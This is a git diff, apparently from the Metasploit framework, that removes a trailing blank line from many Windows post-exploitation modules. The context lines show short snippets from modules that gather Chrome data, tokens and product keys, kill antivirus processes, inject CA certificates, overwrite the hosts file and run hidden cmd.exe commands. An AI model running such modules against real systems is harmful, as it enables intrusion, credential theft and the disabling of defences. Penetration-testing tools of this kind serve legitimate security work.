100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Post print_status("Enumerating applications installed on #{sysinfo['Computer']}") app_list end - end diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index ab6e5f5f77..48793521ee 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Post f = store_loot('enumerated.artifacts', 'text/plain', session, str, name) print_status("#{name} stored in: #{f}") end - end diff --git a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index 75f7b9a234..9b17994770 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -333,5 +333,4 @@ class MetasploitModule < Msf::Post migrate(@old_pid) end end - end diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index e51d48bb77..ed7d00d35f 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -340,6 +340,5 @@ class MetasploitModule < Msf::Post end return data end - end diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index 734a0e0f89..eea92e8bc0 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -89,6 +89,5 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index a99848fe62..bb9777fca7 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Post print_status("Finding Microsoft key on #{sysinfo['Computer']}") app_list end - end diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 151d19bc67..54caabf7ab 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -256,5 +256,4 @@ class MetasploitModule < Msf::Post print_status("Results stored as: #{loot}") print_status("Execution finished.") end - end diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index 68615f3bae..4fa03621c8 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Post print_status "AutoConfigURL: #{autoconfigurl}" if autoconfigurl != "" end - end diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index 0f97843703..67b5d20634 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Post p = store_loot("windows.services", "text/plain", session, results_table.to_s, "windows_services.txt", "Windows Services") print_good("Loot file stored in: #{p.to_s}") end - end diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index db86a227ee..089371d787 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -172,5 +172,4 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index 4b26be9f2f..989380e8a0 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -189,5 +189,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index b151b1817b..68d999b054 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Post return unless datastore['GETALL'] end end - end diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index 7519c3bc0f..8e929e31b9 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Post print_device(devname) end end - end diff --git a/modules/post/windows/gather/ntds_location.rb b/modules/post/windows/gather/ntds_location.rb index f5565dd892..a216b945b0 100644 --- a/modules/post/windows/gather/ntds_location.rb +++ b/modules/post/windows/gather/ntds_location.rb @@ -41,5 +41,4 @@ class MetasploitModule < Msf::Post print_error("NTDS.DIT is reportedly located at `#{ntds}', but the file does not appear to exist") end end - end diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 3caa81507b..0631571c47 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -208,5 +208,4 @@ class MetasploitModule < Msf::Post out << sprintf("%25s\t%50s\n", "Driver", hash['Driver']) return out end - end diff --git a/modules/post/windows/gather/win_privs.rb b/modules/post/windows/gather/win_privs.rb index 59d92b1e2f..855cea5ff6 100644 --- a/modules/post/windows/gather/win_privs.rb +++ b/modules/post/windows/gather/win_privs.rb @@ -58,5 +58,4 @@ class MetasploitModule < Msf::Post print_line(usr_tbl.to_s) print_line(privs_tbl.to_s) end - end diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index 404455f9aa..4488a471ff 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Post print_status("Command output saved to: #{command_log}") end - end diff --git a/modules/post/windows/manage/change_password.rb b/modules/post/windows/manage/change_password.rb index 6bbe3d98a8..2dcc7a079d 100644 --- a/modules/post/windows/manage/change_password.rb +++ b/modules/post/windows/manage/change_password.rb @@ -72,6 +72,5 @@ class MetasploitModule < Msf::Post end end - end diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index 1187ce0997..c4388d0a20 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -155,5 +155,4 @@ class MetasploitModule < Msf::Post target_settings(dst_root_key, dst_base_key) end - end diff --git a/modules/post/windows/manage/exec_powershell.rb b/modules/post/windows/manage/exec_powershell.rb index a177013ede..fa27434f3f 100644 --- a/modules/post/windows/manage/exec_powershell.rb +++ b/modules/post/windows/manage/exec_powershell.rb @@ -50,5 +50,4 @@ class MetasploitModule < Msf::Post print_status psh_exec(script) print_good 'Finished!' end - end diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index a1e44cdf5e..2d1e08cc67 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -192,5 +192,4 @@ class MetasploitModule < Msf::Post return true end - end diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index 3336aa526f..88a32b0121 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Post print_good("CA inserted!") end end - end diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb index f80d85a19e..6037c94505 100644 --- a/modules/post/windows/manage/killav.rb +++ b/modules/post/windows/manage/killav.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Post print_good("A total of #{processes_found} process(es) were discovered, #{processes_killed} were terminated.") end end - end diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 2fe031f986..49c3c1b095 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -117,6 +117,5 @@ class MetasploitModule < Msf::Post # That's it print_good('Finished!') end - end diff --git a/modules/post/windows/manage/powershell/load_script.rb b/modules/post/windows/manage/powershell/load_script.rb index 07b03c80f6..cf75d3a7e3 100644 --- a/modules/post/windows/manage/powershell/load_script.rb +++ b/modules/post/windows/manage/powershell/load_script.rb @@ -41,5 +41,4 @@ class MetasploitModule < Msf::Post files.each do |script| stage_psh_env(datastore['FOLDER'] + script) end end end - end diff --git a/modules/post/windows/manage/pxeexploit.rb b/modules/post/windows/manage/pxeexploit.rb index fb5aea562c..0754a5ec74 100644 --- a/modules/post/windows/manage/pxeexploit.rb +++ b/modules/post/windows/manage/pxeexploit.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 21bb00ea4c..51fa0ee2dc 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -50,5 +50,4 @@ class MetasploitModule < Msf::Post open_key.delete_key(certtoremove) print_good("Successfully deleted CA: #{certtoremove}") end - end diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index f7fd4da5c0..47aa7d812a 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -54,5 +54,4 @@ class MetasploitModule < Msf::Post client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', meterp_temp) print_good("Done!") end - end diff --git a/modules/post/windows/manage/sticky_keys.rb b/modules/post/windows/manage/sticky_keys.rb index 94e2aa3599..11d1379d8a 100644 --- a/modules/post/windows/manage/sticky_keys.rb +++ b/modules/post/windows/manage/sticky_keys.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Post print_good("'Sticky keys' removed from registry key #{target_key}.") end end - end diff --git a/modules/post/windows/manage/vmdk_mount.rb b/modules/post/windows/manage/vmdk_mount.rb index a01a7b8d62..edef1ae229 100644 --- a/modules/post/windows/manage/vmdk_mount.rb +++ b/modules/post/windows/manage/vmdk_mount.rb @@ -254,5 +254,4 @@ class MetasploitModule < Msf::Post true end - end diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 3130216db2..a33c54b507 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Post ) end end - end diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index e58ede3123..2e1e1cf932 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -50,5 +50,4 @@ class MetasploitModule < Msf::Post r = session.sys.process.execute("cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}", nil, {'Hidden' => true}) end - end diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index 6affe03345..e461916b77 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -125,6 +125,5 @@ class MetasploitModule < Msf::Post return webcams end - end diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index 583f39eb5e..27ad18e65b 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -48,6 +48,5 @@ class MetasploitModule < Msf::Post end end end - end diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index f4fda88897..d5cb8f0144 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -254,5 +254,4 @@ class MetasploitModule < Msf::Post sguid << "-" + aguid[20,12] + "}" return sguid end - end diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index 29c34e46df..ff63a0e017 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -311,5 +311,4 @@ class MetasploitModule < Msf::Post sguid << "-" + aguid[20,12] + "}" return sguid end - end diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index 39abccf8d3..141020c470 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -346,5 +346,4 @@ class MetasploitModule < Msf::Post sguid << "-" + aguid[20,12] + "}" return sguid end - end diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index 3ef5dff8a6..06192d8638 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -171,5 +171,4 @@ class MetasploitModule < Msf::Post sguid << "-" + aguid[20,12] + "}" return sguid end - end